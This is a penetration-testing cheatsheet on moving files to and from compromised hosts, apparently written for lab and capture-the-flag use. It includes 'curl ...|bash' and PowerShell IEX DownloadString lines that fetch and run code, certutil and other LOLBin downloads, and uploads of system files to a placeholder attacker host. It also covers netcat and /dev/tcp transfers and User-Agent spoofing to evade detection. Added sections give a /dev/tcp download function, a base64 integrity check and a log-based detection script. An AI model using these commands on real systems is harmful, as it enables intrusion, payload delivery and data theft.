Transferring Files

Simple Servers

python3 -m http.server 8000
smbserver.py -smb2support share $(pwd)
smbserver.py -smb2support share $(pwd) -user qu35t -password qu35t
python3 -m pyftpdlib -p 21
python3 -m uploadserver
php -S 0.0.0.0:8000
ruby -run -ehttpd . -p8000

Transfer Files

wget http://10.10.10.10:8000/linpeas.sh -O linpeas.sh
curl http://10.10.10.10:8000/linpeas.sh -o /dev/shm/linpeas.sh
curl http://10.10.10.10:8000/linpeas.sh|bash

With SMB server.

copy file.txt \\10.10.10.10\share
copy \\10.10.10.10\share\nc.exe

net use n: \\10.10.10.10\share /user:qu35t qu35t
copy file.txt n:
copy n:\nc.exe

File download.

(New-Object Net.WebClient).DownloadFile('https://docs.qu35t.pw/file.ps1','C:\Users\Public\Downloads\file.ps1')
(New-Object Net.WebClient).DownloadFileAsync('https://docs.qu35t.pw/file.ps1','C:\Users\Public\Downloads\file.ps1')
IEX (New-Object Net.WebClient).DownloadString('https://docs.qu35t.pw/file.ps1')
(New-Object Net.WebClient).DownloadString('https://docs.qu35t.pw/file.ps1') | IEX
Invoke-WebRequest https://docs.qu35t.pw/file.ps1 -OutFile file.ps1
Invoke-WebRequest https://docs.qu35t.pw/file.ps1 -UseBasicParsing | IEX
Invoke-RestMethod https://docs.qu35t.pw/file.ps1 -OutFile file.ps1
certutil -urlcache -split -f http://10.10.10.10/nc.exe
certutil -verifyctl -split -f http://10.10.10.10/nc.exe
GfxDownloadWrapper.exe "http://10.10.10.10/nc.exe" "C:\Temp\nc.exe"

File upload.

Invoke-FileUpload -Uri http://10.10.10.10:8000/upload -File C:\Windows\System32\drivers\etc\hosts
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
Invoke-WebRequest -Uri http://10.10.10.10:8000/ -Method POST -Body $b64
scp linpeas.sh qu35t@10.10.10.10:/dev/shm/linpeas.sh
scp qu35t@10.10.10.10:/dev/shm/linpeas.sh .

Linux

Encode and decode from base64.

base64 linpeas.sh -w 0;echo
echo 'Base64 data'|base64 -d > linpeas.sh

Windows

Encode and decode from base64.

[Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))
[IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("BASE64 DATA"))

Check MD5 hash.

Get-FileHash C:\Users\Public\id_rsa -Algorithm md5 | select Hash

Transfer with netcat (listener on the receiving side).

cat linpeas.sh|nc 10.10.10.10 8001
nc -lvnp 8001 > linpeas.sh

Receive from a listener with /dev/tcp.

cat < /dev/tcp/10.10.10.10/443 > linpeas.sh

Connect to the target webserver.

exec 3<>/dev/tcp/10.10.10.10/80

HTTP GET request.

echo -e "GET /linpeas.sh HTTP/1.1\n\n">&3

Print the response.

cat <&3
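The /dev/tcp download above, carried through as a function. This is an added example, not from the original cheatsheet: the raw `cat <&3` writes the HTTP status line and headers into the output file along with the body, and a request without `Host:` and `Connection: close` is not valid HTTP/1.1 and can hang on a keep-alive server. The function strips the headers, keeps the body binary-safe, and only reports success on a 200. Host, port and path are caller-supplied placeholders.

```shell
#!/usr/bin/env bash
# Added example (not from the original cheatsheet): bash-only HTTP GET over
# /dev/tcp that saves only the response body, for targets without wget/curl.

# Read an HTTP response from fd 3: skip the status line and headers, then
# write the body (binary-safe, via cat) to $1. Returns 0 only for a 200.
http_read_body() {
    local out="$1" status line cr
    cr=$(printf '\r')
    IFS= read -r status <&3
    while IFS= read -r line <&3; do
        line=${line%"$cr"}                # headers are CRLF-terminated
        [ -z "$line" ] && break           # blank line ends the header block
    done
    cat <&3 > "$out"                      # everything left is the body
    case "$status" in
        "HTTP/"*" 200 "*) return 0 ;;
        *) echo "unexpected status: $status" >&2; return 1 ;;
    esac
}

# Open /dev/tcp/<host>/<port> on fd 3, send a minimal but valid HTTP/1.1 GET
# (Host is mandatory; Connection: close makes the server end the stream so
# cat does not block), and save the body to $4.
devtcp_get() {
    local host="$1" port="$2" path="$3" out="$4" rc
    exec 3<>"/dev/tcp/$host/$port" || return 1
    printf 'GET %s HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n' "$path" "$host" >&3
    http_read_body "$out"
    rc=$?
    exec 3>&-
    return "$rc"
}

# Usage (placeholder host and path, as in the cheatsheet):
#   devtcp_get 10.10.10.10 80 /linpeas.sh /dev/shm/linpeas.sh && md5sum /dev/shm/linpeas.sh
```

`http_read_body` reads from whatever is on fd 3, so it can be exercised against a saved response file with `exec 3< response.txt` before trusting it on a live socket.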

Mounting a Linux folder into an RDP session.

rdesktop 10.10.10.10 -d QU35T.pw -u administrator -p 'Password0@' -r disk:linux='/home/qu35t/files'
xfreerdp /v:10.10.10.10 /d:QU35T.pw /u:administrator /p:'Password0@' /drive:linux,/home/qu35t/files

Validating File Transfers

file linpeas.sh
md5sum linpeas.sh
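The Linux base64 encode/decode steps and the hash validation above, combined into one worked example. This is an added example, not from the original cheatsheet: it encodes a file to a single base64 line, decodes it on the receiving side, and checks the copy's MD5 against the original so a truncated or corrupted paste is caught before the file is run. The sample file is constructed in a temporary directory; nothing is downloaded.

```shell
#!/usr/bin/env bash
# Added example (not from the original cheatsheet): base64 round trip with
# hash validation. Requires GNU coreutils (base64 -w 0, md5sum).

# Encode a file as one base64 line, same as `base64 file -w 0` on the page.
b64_encode() {
    base64 -w 0 "$1"
}

# Decode a base64 string into a destination path, same as
# `echo 'Base64 data' | base64 -d > file` on the page.
b64_decode() {
    printf '%s' "$1" | base64 -d > "$2"
}

# Print only the MD5 hex digest of a file (first field of md5sum output).
file_md5() {
    md5sum "$1" | awk '{print $1}'
}

# Compare a received file against the hash taken on the sending side.
# Returns 0 on match, 1 on mismatch (truncated paste, wrong line endings, ...).
verify_md5() {
    local expected="$1" path="$2"
    [ "$(file_md5 "$path")" = "$expected" ]
}

# Full round trip: hash -> encode -> decode -> verify. Returns 0 only if the
# decoded copy is byte-identical to the source.
b64_roundtrip() {
    local src="$1" dst="$2" expected encoded
    expected=$(file_md5 "$src")
    encoded=$(b64_encode "$src")
    b64_decode "$encoded" "$dst"
    verify_md5 "$expected" "$dst"
}

# Demo on a constructed sample file (not a real payload).
demo_dir=$(mktemp -d)
printf 'echo "constructed sample script"\n' > "$demo_dir/sample.sh"
if b64_roundtrip "$demo_dir/sample.sh" "$demo_dir/received.sh"; then
    echo "transfer verified, md5 $(file_md5 "$demo_dir/received.sh")"
else
    echo "hash mismatch, do not run the received file" >&2
fi
```

Take the hash on the sending side before pasting and compare on the receiving side; `file received.sh` (as on the page) only tells you the type, not whether the content is intact.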

Evading Detection

Listing out user agents.

[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl

With Chrome user agent.

Invoke-WebRequest http://10.10.10.10/nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "C:\Users\Public\nc.exe"
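The defender's side of the user-agent trick above, as an added example that is not from the original cheatsheet. PowerShell's `WebClient` and `Invoke-WebRequest` send a User-Agent containing `WindowsPowerShell/<version>` unless `-UserAgent` overrides it, which is why the default is easy to spot in web server logs; the block flags such requests, then shows why that alone is weak by also flagging executable and script downloads whatever the User-Agent says. The log lines are constructed samples in Apache/nginx combined format, not real traffic; the `Microsoft-CryptoAPI/` pattern for `certutil -urlcache` is the typical value and is an assumption here.

```shell
#!/usr/bin/env sh
# Added example (not from the original cheatsheet): flag downloads made with a
# tool's default User-Agent, and downloads of executables regardless of it.

# Default User-Agents of common download tools (the certutil value is assumed).
TOOL_UA_PATTERN='WindowsPowerShell/|curl/|Wget/|python-requests/|Microsoft-CryptoAPI/'

# Paths worth flagging no matter what User-Agent the client presents.
EXEC_PATH_PATTERN='[.](exe|dll|ps1|sh)$'

# stdin: combined-format log lines. stdout: "ip<TAB>path<TAB>user-agent" for
# each request whose User-Agent matches a download tool.
flag_tool_user_agents() {
    awk -v pat="$TOOL_UA_PATTERN" '{
        # Double-quoted fields: q[2] is the request line, q[n-1] the user-agent
        n = split($0, q, "\"")
        split(q[2], r, " ")
        if (q[n-1] ~ pat) printf "%s\t%s\t%s\n", $1, r[2], q[n-1]
    }'
}

# A spoofed User-Agent defeats the check above, so also flag by what was
# fetched. stdout: "ip<TAB>path" for every executable or script download.
flag_executable_downloads() {
    awk -v pat="$EXEC_PATH_PATTERN" '{
        n = split($0, q, "\"")
        split(q[2], r, " ")
        if (r[2] ~ pat) printf "%s\t%s\n", $1, r[2]
    }'
}

# Constructed sample log lines (not real traffic). The last line is the same
# download as the first, made with the Chrome User-Agent from the cheatsheet.
SAMPLE_LOG='10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /nc.exe HTTP/1.1" 200 45272 "-" "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1023"
10.10.14.5 - - [01/Jan/2024:10:00:02 +0000] "GET /linpeas.sh HTTP/1.1" 200 827000 "-" "curl/7.88.1"
10.10.14.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 1203 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
10.10.14.5 - - [01/Jan/2024:10:00:04 +0000] "GET /nc.exe HTTP/1.1" 200 45272 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"'

count_tool_hits() { printf '%s\n' "$SAMPLE_LOG" | flag_tool_user_agents | wc -l | tr -d ' '; }
count_exec_hits() { printf '%s\n' "$SAMPLE_LOG" | flag_executable_downloads | wc -l | tr -d ' '; }

echo "Requests with a download-tool User-Agent:"
printf '%s\n' "$SAMPLE_LOG" | flag_tool_user_agents
echo "Executable/script downloads (any User-Agent):"
printf '%s\n' "$SAMPLE_LOG" | flag_executable_downloads
```

Only two of the four sample requests carry a tool User-Agent, but three are fetches of an executable or script; correlating on path and source IP rather than on the User-Agent alone is what makes the spoofed request visible.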

References

  • GTFOBins

  • LOLBAS


Last updated 2 years ago